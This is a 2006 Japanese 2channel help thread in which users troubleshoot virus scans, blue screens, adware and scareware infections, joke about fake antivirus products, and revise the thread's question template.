924名無しさん@お腹いっぱい。:2006/12/20(水) 19:51:13
>>923
ダメでした
やはり途中で強制再起動
その際に青い画面が一瞬。。。
925名無しさん@お腹いっぱい。:2006/12/20(水) 19:53:14
>>924
もういっそのことavast!の再インストールを試してはどうだろうか。
926名無しさん@お腹いっぱい。:2006/12/20(水) 19:54:35
>>921
色々問題があるだろ、記憶もあるし電子ノートみたいなものも普及してねー死
onenoteとか津川ねー奴多すぎ
927名無しさん@お腹いっぱい。:2006/12/20(水) 19:59:58
>>922
> 最近よくフリーズしたり動作が重い

これがまず問題だよな。ウイルスが原因とは限らないわけで。

まずは、スタートメニュー、ファイル名を指定して実行で
CHKDSK /Fをやってみる。

それから、システムツールでデフラグを掛けてみると良いんじゃないかな?
928名無しさん@お腹いっぱい。:2006/12/20(水) 20:08:39
>>848
いいたいことはだいたい分かるけどちとおれにゃ難しいな。
俺はルータもAVもいれているから気にする必要性は無いと思うんだけど、98や2000、XPで
ルータも持たずFWも持たず接続する人もいるわけでしょ。その場合は・・ってこと何だけど。
祈るしかないわけですか。でもその間に感染ってあまり聞かないような気がするなっておもうんだけど。
OSアップデートのファイルだけ他のPCから落としてRに焼いてインストールするってできますか
またはリカバリーCD自体を作るとかかなぁ?俺にはできんけど

俺は入れ直しかノートンゴースト使ってるけど
929 ◆N9P3SuvBPo :2006/12/20(水) 20:12:51
>922
いっそ、リカバリでもしたほうがいいんじゃない?
avastでスキャン時に強制再起動は、間違い無くウイルスの仕業だと思う。
そういった動作を行うウイルスもある。
avastはもしかして、この「最近よくフリーズしたり動作が重いのでウィルスかなんか入ってるのかな」
という症状が出てきた後に入れた?

>青い画面が一瞬
英語で文字が書かれている奴だな。
もう一度、avastでスキャンしてその画面が出てきたら目を凝らして見てくれ。
初めのほうに「STOP:〜」という英語が書いてあるか確認を。
930名無しさん@お腹いっぱい。:2006/12/20(水) 20:16:01
>>924
メモリ不良か熱暴走だ
931名無しさん@お腹いっぱい。:2006/12/20(水) 20:36:47
>>922
avast!入れる前には何のウィルス対策ソフト入れてたの?
ソフトによってはアンスコしても残骸が残っていてスキャンを邪魔する場合もあるので
932名無しさん@お腹いっぱい。:2006/12/20(水) 21:26:29
>>927 デフラグは既に試したんですけど、何も変わらず…

>>929 切り替わるのが早すぎて厳しいです
先ほどそれを見ようとして強制再起動に再びなったんですけど、
その後にまた別の画面が出てきまして…
言葉で説明するには知識不足なので画像を
ttp://www.imgup.org/iup303149.jpg

>>931 入れてません
avast!を入れたのが2〜3月頃?それまでは何も入れてませんでした。
933名無しさん@お腹いっぱい。:2006/12/20(水) 21:33:01
>>932
そんなに不安定なら無理かも知れんが
オンラインスキャンは試してみたかな?

ttp://www.kaspersky.co.jp/scanforvirus/
カスペオンラインスキャン

後はavast!をアンインスコして、
NODやKISの体験版を落としてスキャンしてみるのも手かも。
934名無しさん@お腹いっぱい。:2006/12/20(水) 21:40:04
>>932
ちなみに、貴方が出した画像はチェックディスク画面。

Windowsが不正終了した時に、ハードディスクにエラーがないかどうか、
確認するため、自動的に起動するプログラム。

その画像だけでは、不正終了が起こったことに対して、
Windowsが自動的に対応した、ということしか判らない。
935 ◆N9P3SuvBPo :2006/12/20(水) 21:41:36
>932
これ、かなり深刻なんじゃねーか。

FWやルータなどのネットワーク感染型ワームの予防ソフトは入ってるよね?
936 ◆N9P3SuvBPo :2006/12/20(水) 21:42:49
書きこむ前にリロードすれば良かった
激しく恥ずかしい自分w
937名無しさん@お腹いっぱい。:2006/12/20(水) 21:45:06
>>936
あるあるw
938 ◆N9P3SuvBPo :2006/12/20(水) 21:54:34
XPは持っているんだがチェックディスクしたことが無いから、
素で思いっきり勘違いしたよ。

そういえば、WindowsXPで不正なシャットダウン(ブルースクリーン)の後に
システムを再起動させない設定っていうのどうやるんだっけ?
誰か>932に教えてやってくれないかな。
939名無しさん@お腹いっぱい。:2006/12/20(水) 22:07:28
おいらxpsp2だけど セーフモードで 
"システム障害時の自動的な再起動を無効にする"って起動方法があるけどこれつかえないの?
http://support.microsoft.com/kb/884240/ja
940名無しさん@お腹いっぱい。:2006/12/20(水) 22:11:20
>>938
マイコンピューターを右クリック>プロパティを選択
>詳細設定タブをクリック
>起動と回復の項目の設定ボタンをクリック
>システムエラーの項目の自動的に再起動のチェックを外す
941939:2006/12/20(水) 22:12:04
セーフモードじゃなくてf8連打するってことね
942 ◆N9P3SuvBPo :2006/12/20(水) 22:25:22
>939
こんなのがあるんだ…初めて知った、(メモメモ
>940
わざわざどうもw
今使ってるのがWin98SEなもんで。

ということで、>932
>939-940のどっちかをやってみて、もう一度Avast!でスキャンして
ブルースクリーンになったらその画面をうpして。
943名無しさん@お腹いっぱい。:2006/12/20(水) 23:11:27
944 ◆N9P3SuvBPo :2006/12/20(水) 23:19:02
>943(922ですね)
STOP:0x00000024エラーが表示される場合の対処方法
http://support.microsoft.com/kb/883003/ja
をやってみる。
945 ◆N9P3SuvBPo :2006/12/21(木) 00:19:08
>941
今、俺が使っているOS(Win98SE)はF8連打しなくても、
メーカーロゴ表示→Windows98ロゴ表示の間
(メーカーロゴ表示後の黒画面になったら直ぐ)に
F8「ポチッとな」でセーフモードなどの起動選択メニューが出るよ。

WindowsXPでもタイミングさえ合えば、F8「ポチッとな」で
拡張オプションメニューが出るんじゃない。

ねみ…
946939:2006/12/21(木) 19:58:54
>>945
そっすね
以前は「ポチッとな」でやってたんですけど サポから連打しろといわれてそのままやってるだけでして

ところで922氏から返信ないすけど
avast ブルースクリーン でぐぐったら結構似た症状のひとが多いんで マシンや他ソフトとの相性問題かもしれないすね

947922:2006/12/21(木) 20:54:39
イロイロ試してました

>>944の方法試したんですけど変わらず
多少動作は軽くなった…気がします
でも強制再起動は相変わらず…

Local Settingsってフォルダスキャンしてる時に強制再起動するんですけど、これは何か関係ありますか?
あとハードウェアの安全な取り外しってのが前から出てるんですけどこれも関係あるのかな…

>>946 前までは大丈夫だったんですけど、唐突にこの様な状態に…
他のソフトが影響してるのかな
948 ◆N9P3SuvBPo :2006/12/21(木) 21:40:15
>947
んー…

>922のほうで"フリーズしたり動作が重くなる"
と言った症状が出てくる前、何かのソフトをインストールしたとか、
ドライバなどの周辺機器を入れたとか、思い当たるは無い?
949922:2006/12/21(木) 21:54:49
入れたとしたら…スキャナ?あとはゲーム用のコントローラーぐらいですかね
他に思い当たるものは…
950 ◆N9P3SuvBPo :2006/12/21(木) 22:01:35
>949
それらの機器を取り外した状態でも…やっぱりなるか…

大事なデータのバックアップはちゃんと取ってありますよね?
951 ◆N9P3SuvBPo :2006/12/21(木) 22:45:03
気になって「ハードウェアの安全な取り外し」というのでググってみたんだけど、
これは周辺機器が接続されている場合に表示されるらしく、
周辺機器が接続されていない時や、特定の機器が接続されている時は、表示されないらしい。
952名無しさん@お腹いっぱい。:2006/12/21(木) 23:35:13
お尋ねしても宜しいでしょうか。

【使用OS】 Windows XP SP2
【WindowsUpdateしてるか】 自動更新ですが、念のため週に1〜2回手動で確認しています。
【AntiVirusは何を使っているか】 WinAntiVirus PRO 2006
【ちゃんとUpdateしてるか】 はい、ちゃんと最新の状態に更新しています。
【スキャンした結果(ウイルス名・発見場所)】 発見できない。
【別のオンラインスキャンしたならその結果は】 シマンテックやバスターのオンラインスキャンでは、WinAntiVirus PRO 2006を検出
【症状を具体的に、分かる限りすべて書く】 WinAntiVirus PRO 2006を入れてから動作が悪くなった。
【何をしたらそんなことになったのか】 貴方のパソコンは「ブラックウォーム」に感染される恐れがある。
セキュリティセンターは貴方のパソコンに「セキュリティミッス」を検出しました。現在使っているアンチウィルスでは
情報の流出を防ぐ事ができないと言われた。
【これまでにとった措置】 怖くなってノートン2006を削除してWinAntiVirus PRO 2006をインストール
【その他の質問】 WinAntiVirus PRO 2006が世界最強のセキュリティソフトと聞いたので、クレカで購入しました。
953名無しさん@お腹いっぱい。:2006/12/21(木) 23:38:36
よぅ、>>952
      ∧_∧                   ∧_∧
     ( ・∀・)     ∧ ∧ ?        (´∀` ) spybotS&Dがほしいんだろ?
     (    )   (*‘ω‘;*)         (    )
     | | |.     (   )             | | |
     (__)_)      v v           (_(__)

















   おらあああ!!            これでもくらえや!!!
                      …!   .∧_∧
 ―=≡三 ∧_∧      \从从///  (´∀` ) 三≡=―
―=≡三と( ・∀・)つ''"´" ⌒_ノ;*;''"´"''::;:,(    つ 三≡=―
 ―=≡三 ヽ     ̄ ̄⌒)>“ω(;;;((⌒ ̄ ̄ ̄_ ) 三≡=―
 ―=≡三 /  / ̄ ̄´""'''¨ (;;#':*,')´''::;;;;::'''"´ ̄ヽ \ 三≡=―
 ―=≡三 \__);   /// v v \\\     (__) 三≡=―
954名無しさん@お腹いっぱい。:2006/12/21(木) 23:39:06
>>952
ネタは禁止です。
955名無しさん@お腹いっぱい。:2006/12/22(金) 00:04:15
【使用OS】 WindowsXPsp2
【WINDOWS UPDATE】 自動更新なので最新
【ウィルスソフト】 DriveCleaner
【UPDATE】 してる
【スキャン】 ファイルの経歴などが検出されて削除した
【症状】 ポップアップがいきなり出てきて
「ファイルがコンピュータにインストールし【プライバシーを進入】するのがたぶん分からず、
お仕事と【ご結婚が危険】です。」というメッセージが出て来ます。
【やったこと】 DriveCleaner購入
【とった処置】 彼女との結婚が来月にあるので、パソコンの履歴から浮気がばれるのを
恐れてDriveCleanerを購入。
スキャンしたら危険な経歴が検出されたので削除しました。
956名無しさん@お腹いっぱい。:2006/12/22(金) 13:21:38
>>955
http://pc8.2ch.net/test/read.cgi/sec/1162464139/
WinAntiVirus-詐欺ソフト対策総合スレ-SystemDoctor
957名無しさん@お腹いっぱい。:2006/12/22(金) 13:37:21
(・∀・)ニヤニヤ
958名無しさん@お腹いっぱい。:2006/12/22(金) 21:23:03
今スキャンしたら

削除しました: ウイルス Worm.Win32.Antinny.ayファイル: C:\WINDOWS\Temp\PR18B.tmp/UPX

削除しました: ウイルス Worm.Win32.Antinny.ayファイル: C:\WINDOWS\Temp\PR18A.tmp/UPX

洒落タマに感染してますか?
Temp\PR18A.tmp/UPXとはどういったファイルでしょうか。
959856:2006/12/22(金) 21:49:28
横レススミマセン
更に非常に亀レスも・・・

どうもHDDのトラブルのようです。確認中ですが、レスをくれた皆様方に報告して
おこうと思いまして、とりあえずの経過を書きました。

レスを頂いたみなさま有難う御座いました。引き続き奮闘中です・・・
960名無しさん@お腹いっぱい。:2006/12/22(金) 21:55:53
地図がどうとか言うアプリを拾っただろ。
P2Pは早く止めたまえよ。
961名無しさん@お腹いっぱい。:2006/12/22(金) 21:58:31
>>959
奮闘中も行けど、今のHDDが何とか動いているうちに、新しいの買ってきて必要なデータを退避させたほうがいいんじゃない?
962958:2006/12/22(金) 23:47:16
>>960
詳しく教えて下さい。
963名無しさん@お腹いっぱい。:2006/12/23(土) 00:55:09
【使用OS】XP
【WINDOWS UPDATE】SP2
【ウィルスソフト】マカフィーウイルススキャン
【UPDATE】4ヶ月ほどしてなかった・・・悔い改め今度から更新します
【スキャン】不可(しようとするとOSが落ちる)
【症状】以前からいきなりIEのページが「WhenUoffer」に変わること多々、最近突然OSがシャットダウン、その後頻繁にシャットダウンするように。再起動後「システムは深刻なエラーから回復しました」と表示。IEもすぐに強制終了するようになった。Janeは使用可
【やったこと】DaemonTools(WithWhenU)でゲームをプレイ
【とった処置】システムの復元、だえもんの削除、WhenUサーチバーの削除
964名無しさん@お腹いっぱい。:2006/12/23(土) 06:18:44
知人からのメールの本文の下に
---------------------------------------------------
Letter content was scanned by WinAntiVirus Pro 2006.
No threat detected.
Please visit www.winantivirus.com for more details.

↑こんな英文が書かれてあったのですが何でしょうか?
よろしくお願いします。
965名無しさん@お腹いっぱい。:2006/12/23(土) 06:32:46
>>964
なんて書かれているかくらいは当然わかるよね?
966名無しさん@お腹いっぱい。:2006/12/23(土) 07:03:26
>>965
はい、それなりに判るのですが
何故、勝手に書かれてあったのか疑問で…
相手方も初心者ですのでなんと言えばよいのか(汗)。。
967名無しさん@お腹いっぱい。:2006/12/23(土) 07:22:09
>>966
WinAntiVirusを使っているわけじゃないからよくわからないが
そっちの方のスレでそういう書き込み機能があるのかどうか聞いてみる。
あなたか、相手方のどちらかがWinAntiVirusお使いじゃないんですか?

ノートンの場合添付ファイルがウイルスなどで削除された場合、
メール本文にその旨書き込まれる仕様になってましたが。
968名無しさん@お腹いっぱい。:2006/12/23(土) 16:37:40
>>964
AVGもデフォルトだとメールの最下部に証明書(ウィルススキャン済み)が付くよ。
一部の国ではこうするのがマナーなのかもしれない。
969 ◆N9P3SuvBPo :2006/12/23(土) 23:57:14
>1のテンプレ変えた方が良くないけ?
【ウィルスソフト】なんて、そんなもの入れたら大変なことになるやろ。
だから新テンプレの候補として↓が適切かと。

質問の時はテンプレを使って質問してください。

テンプレ
【使用OS】
【MicrosoftUpdate】
【使用セキュリティソフト】
【セキュリティソフトの定義ファイルは最新の状態であるか】
【ルータの有無】
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
【どんな症状が出るか】
【症状が出る前に何をやったか】
【症状を解決しようとどのような処置を取ったか】
970名無しさん@お腹いっぱい。:2006/12/24(日) 00:16:04
【ウィルスソフト】ワロタ
確かにそうだ。
971名無しさん@お腹いっぱい。:2006/12/24(日) 00:29:44
あとウイルスをウィルスと書くのはやめてほしい
972例 1:2006/12/24(日) 00:42:05
【使用OS】vista RC1
【MicrosoftUpdate】最新
【使用セキュリティソフト】NOD32 V2.7
【セキュリティソフトの定義ファイルは最新の状態であるか】最新
【ルータの有無】有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】Win32/Delf.NEA
【どんな症状が出るか】デスクトップにドクロマーク
【症状が出る前に何をやったか】sexe.jpgをクリック
【症状を解決しようとどのような処置を取ったか】reverte to the snapshot
【その他】おっおっお

973 ◆N9P3SuvBPo :2006/12/24(日) 01:50:34
【P2P(ファイル交換ソフト)は使っているか】
これをテンプレに入れようと考えたんだが、
【どんな症状が出るか】
【症状が出る前に何をやったか】
というテンプレ見ればなんとなく分かるし、
怪しいと思ったらその都度聞けばいいし。
974名無しさん@お腹いっぱい。:2006/12/24(日) 05:17:58
次スレの番号は41だからね!!!
975名無しさん@お腹いっぱい。:2006/12/24(日) 09:18:58
お教え下さい
分からない人は「クリックしないで下さい!」
ただ今荒らされてるんですが、↓は
もしかしてウィルスサイトへ飛ぶリンクでしょうか?

http://www.youtube.suppa.jp/?r091v/*12*_test
http://www.youtube.suppa.jp/?d7azg/*1*_test2
http://www.youtube.suppa.jp/?d7azg/*1*_Expocomic_COSPLAY
976名無しさん@お腹いっぱい。:2006/12/24(日) 14:55:06
>>966
友達に教えてやれよ、インチキ詐欺ソフト入れただろって
スパイウエア対策ソフトで、さっさと削除しろって

http://www.google.com/search?hl=ja&lr=lang_ja&ie=UTF-8&oe=UTF-8&q=WinAntiVirus+Pro+2006&num=50
977966:2006/12/24(日) 18:49:33
ありがとうございます。
参考になりました。
早速対処するように連絡します。
978名無しさん@お腹いっぱい。:2006/12/24(日) 20:46:59
>>975
注意!ループタグを発見しますた!
979名無しさん@お腹いっぱい。:2006/12/24(日) 20:52:27
>>975
Operaで見たら少し重くなるだけだったが・・
980名無しさん@お腹いっぱい。:2006/12/24(日) 21:47:58
>>978 ループタグってなんでつか? ぐぐってみるが・・・
981名無しさん@お腹いっぱい。:2006/12/24(日) 21:52:09
>>979
どもです、勇者。 じゃIP確認への釣りとか・・・。
相手の意図がわからない。
982 ◆N9P3SuvBPo :2006/12/25(月) 00:46:22
新しいテンプレ(一部追記)は以下の通りで異論は無いでしょうか。

【使用OS】
【MicrosoftUpdate】
【使用セキュリティソフト】
【セキュリティソフトの定義ファイルは最新の状態であるか】
【ルータの有無】
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
【どんな症状が出るか】
【症状が出る前に何をやったか】
【症状を解決しようとどのような処置を取ったか】
【その他の質問】

>【ルータの有無】
ぶっちゃけこれ要らないんじゃないと思う人もいるけど、
質問者がWindows2000でルータ無しでFWソフトも無しの環境で、
リカバリしなくちゃいけないような症状に陥っている場合、
それでリカバリしたは良いけど、その直後にネットに繋いで即再感染
という自体も有り得るので。(その際はルータか、FW付きアンチウイルスソフトの購入を奨める)
WindowsXPの場合はデフォルトでFWが入ってる(SP2の場合はデフォルトで有効になってる)
から、こちらのOSの場合はルータが無くてもFWを有効にさえしとけば、外部からの
侵入はとりあえず遮断できる。
983名無しさん@お腹いっぱい。:2006/12/25(月) 08:19:06
知人から相談受けました。
【使用OS】2kpro
【WINDOWS UPDATE】自動でやってるとのこと
【アンチウィルスソフト】ZERO
【UPDATE】自動
【スキャン結果】ホワイター
【症状】Dドライブのファイル削除
【やったこと】エロゲインスコしようとしてホワイターオートラン起動
【とった処置】起動してしまったホワイターを途中で止め、ファイル削除とレジストリ削除

本人もある程度スキルあるんですが、うっかりドライブ買い替えた後のオートランを無効にしわすれてホワイターが動いてしまったそうです。
ホワイターを途中で止めた為、被害がDドライブの7割程で済んだそうです。

で、相談受けたのですが、この消されたファイルをファイナルデータ等で遡及出来ないか?ってことです。
ホワイターがファイルを書き換えてから削除してなければ…と思うんですが…

とりあえず駄目元でファイナルデータ買わせて見ようと思ってますが、どうでしょうか?
984名無しさん@お腹いっぱい。:2006/12/25(月) 09:51:50
>>983
くっだらない上にでたらめだな
ある程度スキルある奴がスキルのないお前さんに頼るのか
ソースネクストの使っててスキルもくそもあるかってーの
お互い検索エンジンも知らないド素人じゃねえか
http://mxtrojan.at.infoseek.co.jp/column02.html
つーかファイナルデータは体験版があるんだから試してみりゃいいだろ
フリーの復元ソフトもあるしよ
985983:2006/12/25(月) 12:09:19
>>984
セキュリティに関して素人なのにスキルがあるなんて書いて申し訳ありません。
ファイルデータに体験版があるとはしりませんでした。
取り急ぎ、ファイルデータの体験版を試させてみます。

失礼しましたm(__)m
986名無しさん@お腹いっぱい。:2006/12/25(月) 14:38:53
質問です
http://adultfrienfinder.com/go/page/gallery_landing_page?pid=g674245-pってところにずっと飛ばされ続けて他のページを表示することが出来ません。ノートンの無料版を使っても何も検出されませんでしたがこれってウィルスですか?
あと、解決法はありますか?
987名無しさん@お腹いっぱい。:2006/12/25(月) 15:13:54
>986に追加です。こんな状態になったのは2ちゃんのどこかの板に貼られてたURLを踏んでからです
988名無しさん@お腹いっぱい。:2006/12/25(月) 15:49:26
>>986

まずカスペルスキー:オンライン ウイルス&スパイウェアスキャナで調べてみてね
ttp://www.kaspersky.co.jp/scanforvirus/
989名無しさん@お腹いっぱい。:2006/12/25(月) 16:52:23
>>986
1.アドオンの管理におかしなアドオンがあれば読み込み無効
2.信頼済みサイトにおかしなURLが追加されてないかを確認(あれば削除)
3.スパイウェア駆除ソフトを使う(Ad-AwareやSpybot)
990983 :2006/12/25(月) 19:34:56
>>984
見受けたところあなた様にスキルがあるようには思えませんが、
パソコンの前で王様気取りになってらっしゃるだけではないですか?
裸の王様
991名無しさん@お腹いっぱい。:2006/12/25(月) 19:35:30
>>982
乙です 私は異論ありません
あとBOTに関してのテンプレを入れたほうがいいのではないかと思います
以下サイバークリーンセンターからの引用ですがいかがなものでしょうか

ボットにご注意!!
ボットとは、コンピュータを悪用することを目的に作られた悪性プログラムで、コンピュータに感染すると、
インターネットを通じて悪意を持った攻撃者(以下「攻撃者」という)が、あなたのコンピュータを外部から遠隔操作します。
感染すると、この攻撃者があなたのコンピュータを操り「迷惑メールの大量配信」、「特定サイトの攻撃」等の迷惑行為をはじめ、
あなたのコンピュータ内の情報を盗み出す「スパイ活動」など深刻な被害をもたらします。
この操られる動作が、ロボット(Robot)に似ているところから、ボット(BOT)と呼ばれています。

ボットに感染したコンピュータは、攻撃者が用意した指令サーバなどに自動的に接続され、
数十〜数百万台のボット感染コンピュータを従えた「ボットネットワーク」と言われる巨大ネットワークを形成します。
感染したコンピュータは、攻撃者からの命令を待ち受け、攻撃者が下す命令によって、攻撃者の意のままに数十〜数百万台の感染コンピュータが操られた結果、
フィッシング目的などのスパムメールの大量送信や、特定サイトへのDDoS攻撃などに利用され、とても大きな脅威となります。
このため、感染コンピュータを使用しているユーザーは、知らぬ間に犯罪の踏み台にされ、「被害者」であると同時に「加害者」にもなってしまうのです
〜サイバークリーンセンター より引用〜

サイバークリーンセンター ボットとは
https://www.ccc.go.jp/bot/index.html
TREND MICRO ボット系ウイルス対策Web
http://www.trendmicro.com/jp/security/web/archive/overview/bot.htm
インターネット上の新たな脅威「ボット(bot)」に気をつけろ!(上)
http://itpro.nikkeibp.co.jp/free/ITPro/OPINION/20041215/153889/?ST=security
992名無しさん@お腹いっぱい。:2006/12/25(月) 19:36:03
>989
ごめんなさい、アドオンをどうやって表示すればいいかわかりません。あと、他のサイトを表示することができません。リカバリーしてもダメでした・・・orz
993名無しさん@お腹いっぱい。:2006/12/25(月) 19:47:22
>>991
俺はもっとテンプレをたすべきではないかと思う 
そうしたら初心者 俺もだけど
わかりやすくなると思うし、事実上2chの9割はそこに価値があると思うのだが
今まであったのをQAにしてもいいだろうし
994名無しさん@お腹いっぱい。:2006/12/25(月) 20:04:14
>>992
ツール(T)>アドオンの管理
995 ◆N9P3SuvBPo :2006/12/25(月) 20:07:02
>991
BOT系ウイルスか…
そういえばサイバークリーンセンターにSPYBOT(こちらはBOT系ウイルス)
とspybot S&D(こちらはスパイウェアの予防・駆除ソフト)の両者の違いが書いてあったかな?

>993
Q&Aは例を上げると↓とか?
Q回答者が質問者に対して「リカバリしなさい」と言うのはどうしてですか?

A基本中の基本だからです。

ここまでかな。
996名無しさん@お腹いっぱい。:2006/12/25(月) 20:08:19
>>991
ファイアーウォールかルーターでオープンポートをブロックしとけば
取り敢えず外部からのリモート操作は防げるから問題ない。
997名無しさん@お腹いっぱい。:2006/12/25(月) 20:18:05
>994
なぜか表示されませんorz
998名無しさん@お腹いっぱい。:2006/12/25(月) 20:19:35
999 ◆N9P3SuvBPo :2006/12/25(月) 20:34:51
>997
ブラウザはIE6SP2か?
1000名無しさん@お腹いっぱい。:2006/12/25(月) 20:35:00
産め
10011001
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。